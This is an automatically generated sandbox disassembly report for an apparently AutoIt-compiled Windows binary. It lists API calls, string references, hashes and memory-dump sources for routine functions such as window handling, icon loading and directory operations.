                                                                                                                                                                  • Opcode ID: 53d97cf760b2ef73610e2e3e09d14fe33236859e763ac762ad373951f780a82d
                                                                                                                                                                  • Instruction ID: 4239641bb76de32596fc3a6b2e15dd2d2a8fb93724a0a0cbb2a7ea7caccd383d
                                                                                                                                                                  • Opcode Fuzzy Hash: 53d97cf760b2ef73610e2e3e09d14fe33236859e763ac762ad373951f780a82d
                                                                                                                                                                  • Instruction Fuzzy Hash: 5A81B03101434A9BEF05CF10DC85FAAB7D8EF64714F15846AFD859A092DB30DDA6CBA1
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __wcsnicmp
                                                                                                                                                                  • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                                                                  • API String ID: 1038674560-1810252412
                                                                                                                                                                  • Opcode ID: 93b2a5c838992af7e4e8ac768bdd8228c62caf481d108e2a575f0b44c20d2553
                                                                                                                                                                  • Instruction ID: f7de6bb6b8fe5413974bf075d31833ef97d5952a587a8ee3e24a34250f8dea59
                                                                                                                                                                  • Opcode Fuzzy Hash: 93b2a5c838992af7e4e8ac768bdd8228c62caf481d108e2a575f0b44c20d2553
                                                                                                                                                                  • Instruction Fuzzy Hash: 6D319E31964646F6DF14EB61CD13EEE73A99F31708F610426F841710D2FFA16F688A51
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadIconW.USER32(00000063), ref: 0021F8AB
                                                                                                                                                                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0021F8BD
                                                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 0021F8D4
                                                                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 0021F8E9
                                                                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 0021F8EF
                                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 0021F8FF
                                                                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 0021F905
                                                                                                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0021F926
                                                                                                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0021F940
                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 0021F949
                                                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 0021F9B4
                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 0021F9BA
                                                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 0021F9C1
                                                                                                                                                                  • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0021FA0D
                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0021FA1A
                                                                                                                                                                  • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0021FA3F
                                                                                                                                                                  • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0021FA6A
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3869813825-0
                                                                                                                                                                  • Opcode ID: 51e3feb387150a0910c28d8ffc11d69e6cc1ac9db146ffcfc554011760f94e54
                                                                                                                                                                  • Instruction ID: 2cda82ac208d0a577dd37d756676de3ae297aeddf207196112524e52033f1112
                                                                                                                                                                  • Opcode Fuzzy Hash: 51e3feb387150a0910c28d8ffc11d69e6cc1ac9db146ffcfc554011760f94e54
                                                                                                                                                                  • Instruction Fuzzy Hash: 62515070A0070AAFDB209FA8DE89FAEBBF5FF04704F004528E596A25A0D774A954CF50
                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 0024CD0B
                                                                                                                                                                  • DestroyWindow.USER32(00000000,?), ref: 0024CD83
                                                                                                                                                                    • Part of subcall function 001E7E53: _memmove.LIBCMT ref: 001E7EB9
                                                                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0024CE04
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0024CE26
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0024CE35
                                                                                                                                                                  • DestroyWindow.USER32(?), ref: 0024CE52
                                                                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,001E0000,00000000), ref: 0024CE85
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0024CEA4
                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 0024CEB9
                                                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 0024CEC0
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0024CED2
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0024CEEA
                                                                                                                                                                    • Part of subcall function 001FB155: GetWindowLongW.USER32(?,000000EB), ref: 001FB166
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                                                                  • String ID: 0$tooltips_class32
                                                                                                                                                                  • API String ID: 1297703922-3619404913
                                                                                                                                                                  • Opcode ID: 0b35771326769c17f9856a32f373fd4a1ea90d8c3a51da45fd85e05b64be9251
                                                                                                                                                                  • Instruction ID: d348756853848aacb4de7150fdf3afa821fbc0fe9b734c3e1e1c1fd694a0a49c
                                                                                                                                                                  • Opcode Fuzzy Hash: 0b35771326769c17f9856a32f373fd4a1ea90d8c3a51da45fd85e05b64be9251
                                                                                                                                                                  • Instruction Fuzzy Hash: EA71F275250349AFE729CF28DC44FAA3BE5FB89704F54051CF986972A1DB71E821CB11
                                                                                                                                                                  APIs
                                                                                                                                                                  • VariantInit.OLEAUT32(00000000), ref: 0022B46D
                                                                                                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 0022B476
                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 0022B482
                                                                                                                                                                  • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0022B561
                                                                                                                                                                  • __swprintf.LIBCMT ref: 0022B591
                                                                                                                                                                  • VarR8FromDec.OLEAUT32(?,?), ref: 0022B5BD
                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 0022B63F
                                                                                                                                                                  • SysFreeString.OLEAUT32(00000016), ref: 0022B6D1
                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 0022B727
                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 0022B736
                                                                                                                                                                  • VariantInit.OLEAUT32(00000000), ref: 0022B772
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                                                                                                  • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                                                                  • API String ID: 3730832054-3931177956
                                                                                                                                                                  • Opcode ID: fee756fbf8e48644c81e9bb9beb503bbbb8002c61a7e15535314ed102ae68f35
                                                                                                                                                                  • Instruction ID: c9364842ec4252d48dc80071ff9f37c0f7da0eb37a9fc477cd015644e73c5149
                                                                                                                                                                  • Opcode Fuzzy Hash: fee756fbf8e48644c81e9bb9beb503bbbb8002c61a7e15535314ed102ae68f35
                                                                                                                                                                  • Instruction Fuzzy Hash: F6C1D431A20A26FBDB21EFA5E494B79F7B4FF09300F148455E4059B592DBB0EC60DBA1
                                                                                                                                                                  APIs
                                                                                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00246FF9
                                                                                                                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00247044
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: BuffCharMessageSendUpper
                                                                                                                                                                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                  • API String ID: 3974292440-4258414348
                                                                                                                                                                  • Opcode ID: 07e55665c397a65175f598269e7e0893a8fd1a6147c9c4151d5addd664e78b6a
                                                                                                                                                                  • Instruction ID: d5fb005f2f69d535045344ac4a1de6e34170fb3a9f91b8d709abff6a4b5a8253
                                                                                                                                                                  • Opcode Fuzzy Hash: 07e55665c397a65175f598269e7e0893a8fd1a6147c9c4151d5addd664e78b6a
                                                                                                                                                                  • Instruction Fuzzy Hash: 7891A4342147029FCB18EF14C851A6DB7A2EF64350F04886DF8AA5B3A2DB71ED5ACB41
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0024E3BB
                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00249615,?), ref: 0024E417
                                                                                                                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0024E457
                                                                                                                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0024E49C
                                                                                                                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0024E4D3
                                                                                                                                                                  • FreeLibrary.KERNEL32(?,00000004,?,?,?,00249615,?), ref: 0024E4DF
                                                                                                                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0024E4EF
                                                                                                                                                                  • DestroyCursor.USER32(?), ref: 0024E4FE
                                                                                                                                                                  • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0024E51B
                                                                                                                                                                  • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0024E527
                                                                                                                                                                    • Part of subcall function 00201BC7: __wcsicmp_l.LIBCMT ref: 00201C50
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                                                                                                                                                                  • String ID: .dll$.exe$.icl
                                                                                                                                                                  • API String ID: 3907162815-1154884017
                                                                                                                                                                  • Opcode ID: 7304e6567880a646a641d610404e2abcfb9b1a91a4e44331b62032a396deace7
                                                                                                                                                                  • Instruction ID: 21175a424029f7e0e112ae8f6d4bf2af6166d679b6c83c369e82575aadf2d8b6
                                                                                                                                                                  • Opcode Fuzzy Hash: 7304e6567880a646a641d610404e2abcfb9b1a91a4e44331b62032a396deace7
                                                                                                                                                                  • Instruction Fuzzy Hash: CB61C171A20619BFEF18DF64DC45FBE7BA8BB08710F108115F915E60D1DBB499A0CBA0
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetLocalTime.KERNEL32(?), ref: 00230EFF
                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00230F0F
                                                                                                                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00230F1B
                                                                                                                                                                  • __wsplitpath.LIBCMT ref: 00230F79
                                                                                                                                                                  • _wcscat.LIBCMT ref: 00230F91
                                                                                                                                                                  • _wcscat.LIBCMT ref: 00230FA3
                                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00230FB8
                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00230FCC
                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00230FFE
                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0023101F
                                                                                                                                                                  • _wcscpy.LIBCMT ref: 0023102B
                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0023106A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                                                                                                  • String ID: *.*
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001E84A6: __swprintf.LIBCMT ref: 001E84E5
                                                                                                                                                                    • Part of subcall function 001E84A6: __itow.LIBCMT ref: 001E8519
                                                                                                                                                                  • CharLowerBuffW.USER32(?,?), ref: 0022DB26
                                                                                                                                                                  • GetDriveTypeW.KERNEL32 ref: 0022DB73
                                                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0022DBBB
                                                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0022DBF2
                                                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0022DC20
                                                                                                                                                                    • Part of subcall function 001E7E53: _memmove.LIBCMT ref: 001E7EB9
                                                                                                                                                                  • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                                                                  • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00254085,00000016,0000138B,?,00000000,?,?,00000000,?), ref: 00223145
                                                                                                                                                                  • LoadStringW.USER32(00000000,?,00254085,00000016), ref: 0022314E
                                                                                                                                                                    • Part of subcall function 001ECAEE: _memmove.LIBCMT ref: 001ECB2F
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,00254085,00000016,0000138B,?,00000000,?,?,00000000,?,00000040), ref: 00223170
                                                                                                                                                                  • LoadStringW.USER32(00000000,?,00254085,00000016), ref: 00223173
                                                                                                                                                                  • __swprintf.LIBCMT ref: 002231B3
                                                                                                                                                                  • __swprintf.LIBCMT ref: 002231C5
                                                                                                                                                                  • _wprintf.LIBCMT ref: 0022326C
                                                                                                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00223283
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                                                                                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                  APIs
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                                                                                                                                  • String ID:
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0021B8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0021B903
                                                                                                                                                                    • Part of subcall function 0021B8E7: GetLastError.KERNEL32(?,0021B3CB,?,?,?), ref: 0021B90D
                                                                                                                                                                    • Part of subcall function 0021B8E7: GetProcessHeap.KERNEL32(00000008,?,?,0021B3CB,?,?,?), ref: 0021B91C
                                                                                                                                                                    • Part of subcall function 0021B8E7: RtlAllocateHeap.NTDLL(00000000,?,0021B3CB), ref: 0021B923
                                                                                                                                                                    • Part of subcall function 0021B8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0021B93A
                                                                                                                                                                    • Part of subcall function 0021B982: GetProcessHeap.KERNEL32(00000008,0021B3E1,00000000,00000000,?,0021B3E1,?), ref: 0021B98E
                                                                                                                                                                    • Part of subcall function 0021B982: RtlAllocateHeap.NTDLL(00000000,?,0021B3E1), ref: 0021B995
                                                                                                                                                                    • Part of subcall function 0021B982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0021B3E1,?), ref: 0021B9A6
                                                                                                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0021B5F7
                                                                                                                                                                  • _memset.LIBCMT ref: 0021B60C
                                                                                                                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0021B62B
                                                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 0021B63C
                                                                                                                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 0021B679
                                                                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0021B695
                                                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 0021B6B2
                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0021B6C1
                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0021B6C8
                                                                                                                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0021B6E9
                                                                                                                                                                  • CopySid.ADVAPI32(00000000), ref: 0021B6F0
                                                                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0021B721
                                                                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0021B747
                                                                                                                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0021B75B
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetDC.USER32(00000000), ref: 0023A2DD
                                                                                                                                                                  • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0023A2E9
                                                                                                                                                                  • CreateCompatibleDC.GDI32(?), ref: 0023A2F5
                                                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 0023A302
                                                                                                                                                                  • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 0023A356
                                                                                                                                                                  • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 0023A392
                                                                                                                                                                  • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 0023A3B6
                                                                                                                                                                  • SelectObject.GDI32(00000006,?), ref: 0023A3BE
                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 0023A3C7
                                                                                                                                                                  • DeleteDC.GDI32(00000006), ref: 0023A3CE
                                                                                                                                                                  • ReleaseDC.USER32(00000000,?), ref: 0023A3D9
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                  • String ID: (
                                                                                                                                                                  • API String ID: 2598888154-3887548279
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0024E57B
                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000), ref: 0024E586
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0024E593
                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 0024E59C
                                                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0024E5AB
                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0024E5B4
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0024E5BB
                                                                                                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0024E5CC
                                                                                                                                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,0026D9BC,?), ref: 0024E5E5
                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 0024E5F5
                                                                                                                                                                  • GetObjectW.GDI32(?,00000018,000000FF), ref: 0024E619
                                                                                                                                                                  • CopyImage.USER32(?,00000000,?,?,00002000), ref: 0024E644
                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 0024E66C
                                                                                                                                                                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0024E682
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Global$CloseFileHandleObject$AllocCopyCreateDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1759995340-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00242AA6,?,?), ref: 00243B0E
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: BuffCharUpper
                                                                                                                                                                  • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU$|E)
                                                                                                                                                                  • API String ID: 3964851224-2497493821
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 0022D96C
                                                                                                                                                                  • __swprintf.LIBCMT ref: 0022D98E
                                                                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 0022D9CB
                                                                                                                                                                  • _memset.LIBCMT ref: 0022DA0F
                                                                                                                                                                  • _wcsncpy.LIBCMT ref: 0022DA4B
                                                                                                                                                                  • DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 0022DA80
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0022DA8B
                                                                                                                                                                  • RemoveDirectoryW.KERNEL32(?), ref: 0022DA94
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0022DA9E
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseDirectoryHandle$ControlCreateDeviceFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                                                                  • String ID: :$\$\??\%s
                                                                                                                                                                  • API String ID: 1122224643-3457252023
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00253C64,00000010,00000000,Bad directive syntax error,0027DBF0,00000000,?,00000000,?,>>>AUTOIT SCRIPT<<<), ref: 002232D1
                                                                                                                                                                  • LoadStringW.USER32(00000000,?,00253C64,00000010), ref: 002232D8
                                                                                                                                                                    • Part of subcall function 001ECAEE: _memmove.LIBCMT ref: 001ECB2F
                                                                                                                                                                  • _wprintf.LIBCMT ref: 00223309
                                                                                                                                                                  • __swprintf.LIBCMT ref: 0022332B
                                                                                                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00223395
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                                                                                                                  • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:$"*
                                                                                                                                                                  • API String ID: 1506413516-1217663547
                                                                                                                                                                  • Opcode ID: 58edf2b1659332f3bf6ae72d92f0ce8a693af0124e7ea7c698090462b42d7308
                                                                                                                                                                  • Instruction ID: dd8ef2eface0a22d36247b0a84fd9445ba1973b09274367b4aa2b93c6f3b3709
                                                                                                                                                                  • Opcode Fuzzy Hash: 58edf2b1659332f3bf6ae72d92f0ce8a693af0124e7ea7c698090462b42d7308
                                                                                                                                                                  • Instruction Fuzzy Hash: CE217131860259BBCF01EFD1DC0AEEE7775BF24704F004456F515610A2DBB59B68DBA0
                                                                                                                                                                  APIs
                                                                                                                                                                  • __wsplitpath.LIBCMT ref: 00230C93
                                                                                                                                                                  • _wcscat.LIBCMT ref: 00230CAB
                                                                                                                                                                  • _wcscat.LIBCMT ref: 00230CBD
